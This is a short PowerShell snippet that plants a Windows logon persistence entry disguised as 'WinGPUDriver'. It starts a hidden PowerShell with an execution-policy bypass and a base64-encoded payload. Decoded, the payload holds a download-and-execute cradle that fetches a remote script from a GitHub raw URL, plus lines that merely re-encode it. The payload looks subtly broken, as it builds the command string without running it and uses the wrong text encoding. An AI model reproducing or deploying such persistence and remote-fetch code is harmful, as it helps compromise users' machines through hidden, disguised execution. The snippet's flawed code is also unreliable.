Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" `
-Name "WinGPUDriver" `
-Value 'powershell.exe -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ''-ExecutionPolicy Bypass -EncodedCommand JGNvZGUgPSAnaWV4IChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCJodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vSmlyaVdlaXNzL1ZlY3JhL21haW4vVmVjcmExLnBzMSIpJwokYnl0ZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVbmljb2RlLkdldEJ5dGVzKCRjb2RlKQokZW5jb2RlZCA9IFtDb252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoJGJ5dGVzKQo='' -WindowStyle Hidden"'
